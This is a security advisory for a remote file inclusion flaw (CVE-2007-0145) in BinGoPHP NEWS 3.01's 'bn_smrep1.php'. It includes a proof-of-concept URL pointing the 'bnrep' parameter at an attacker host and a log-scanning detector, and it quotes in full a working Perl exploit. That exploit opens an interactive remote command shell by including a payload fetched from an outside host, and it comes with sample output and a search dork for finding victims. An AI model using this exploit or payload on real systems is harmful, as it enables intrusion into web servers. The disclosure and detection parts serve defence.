BinGoPHP NEWS Include File Bug in 'bn_smrep1.php' Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1017477
SecurityTracker URL: http://securitytracker.com/id?1017477
CVE Reference: CVE-2007-0145
Updated: May 20 2008
Original Entry Date: Jan 8 2007
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 3.01

Description: psych0 reported a vulnerability in BinGoPHP NEWS. A remote user can include and execute arbitrary code on the target system.

The 'bn_smrep1.php' script does not properly validate user-supplied input in the 'bnrep' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/BPNEWS/bn_smrep1.php?bnrep=http://attacker/bo3o?&

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.
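
With no vendor fix listed, one defensive option is to look for abuse of the 'bnrep' parameter in web server access logs. The sketch below is an added example, not part of the original advisory or of BinGoPHP; it assumes Common/Combined Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "/bn_smrep1.php"  # script named in the advisory
PARAM = "bnrep"            # parameter named in the advisory
# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# URL schemes and PHP stream wrappers that make include() load non-local content.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect):", re.I)

def fully_decode(value, rounds=3):
    """Strip leftover layers of percent-encoding (e.g. %2568ttp)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return 'remote-include', 'param-supplied' or None for one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not unquote(url.path).lower().endswith(SCRIPT):
        return None
    verdict = None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != PARAM:
            continue
        # Any request-supplied bnrep is suspect: it is prepended to the include path.
        verdict = "param-supplied"
        if REMOTE_RE.match(fully_decode(value)):
            return "remote-include"
    return verdict

# Constructed sample log lines (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jan/2007:13:10:01 +0000] "GET /BPNEWS/bn_smrep1.php?bnrep=http://attacker/bo3o?& HTTP/1.1" 200 512',
    '192.0.2.11 - - [07/Jan/2007:13:10:05 +0000] "GET /BPNEWS/bn_smrep1.php?bnrep=%48TTP%3A%2F%2Fattacker%2Fbo3o%3F HTTP/1.1" 200 512',
    '192.0.2.12 - - [07/Jan/2007:13:10:09 +0000] "GET /BPNEWS/bn_smrep1.php?bnrep=../ HTTP/1.1" 200 90',
    '192.0.2.13 - - [07/Jan/2007:13:10:12 +0000] "GET /BPNEWS/bn_smrep1.php HTTP/1.1" 200 90',
    '192.0.2.14 - - [07/Jan/2007:13:10:15 +0000] "GET /index.php?bnrep=http://attacker/x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "<-", line.split('"')[1])
```

This inspects query strings only, since access logs do not record request bodies or cookie values.
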

Vendor URL: bingophp.free.fr/
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: ". ." <psych0x96@gmail.com>
Message History: None.

Source Message Contents

Date: Sun, 7 Jan 2007 13:09:30 +0000
From: ". ." <psych0x96@gmail.com>
Subject: BinGoPHP News 3.01 (bnrep) Remote File Inclusion
#!/usr/bin/perl
#
# BinGoPHP News 3.01 (bnrep) Remote File Inclusion
# Script: BP News Version v3.01
# Website: http://bpdesign.infoliens.com/bphp/
# dl: http://bingophp.free.fr/BinGoPHPnewslast_full.zip
# Discovered by: psych0 - psych0x96 gmail com
# greetzz simo64
# *********
# vulnerable code in BPNEWS/bn_smrep1.php
# 2. include "$bnrep"."bn_configs.php";
# PoC:
# http://target/BPNEWS/bn_smrep1.php?bnrep=http://attacker/bo3o?&
# dork: "Script realise par BinGo PHP"
######################################################
#
# perl bpnews.pl http://www.tarjet.ma
#
# =====================================================
# = BP News 3.01 (bnrep) Remote Command Execution =
# =====================================================
#
# shell |$ id
# uid=80(www) gid=80(www) groups=80(www)
# shell |$ exit
#
# Enjoy !
#
use LWP::Simple;
print"
=====================================================
= BP News 3.01 (bnrep) Remote Command Execution =
=====================================================
\n";
my $targ,$rsh,$path,$con,$cmd,$data,$getit ;
$targ = $ARGV[0];
$rsh = $ARGV[1];
if(!$ARGV[1]) {$rsh = "http://img15.imgspot.com/u/07/5/21/walou1168136692.jpg";}
if(!@ARGV) { &usage;exit(0);}
$targ = $ARGV[0];
chomp($targ);
chomp($rsh);
$path = $targ."/BPNEWS/bn_smrep1.php";
$con = get($path) || die "[-]Cannot connect to Host";
sub usage(){
print "Usage : perl $0 host/path [OPTION]\n\n";
print "Ex : perl $0 http://www.target.com\n";
print " perl $0 http://www.target.com http://yoursite/yourcmd.txt\n\n";
}
while ()
{
print "shell |\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}
$getit = $path."?bnrep=".$rsh."?&cmd=".$cmd;
$data=get($getit);
if($cmd eq ""){ print "Please enter command !\n"; }
else{ print $data ;}
}
#@moumou is baaaaaackkkkk
#(c) mouradmix@hotmail.com hehe:p~
#...
#**happy 3id**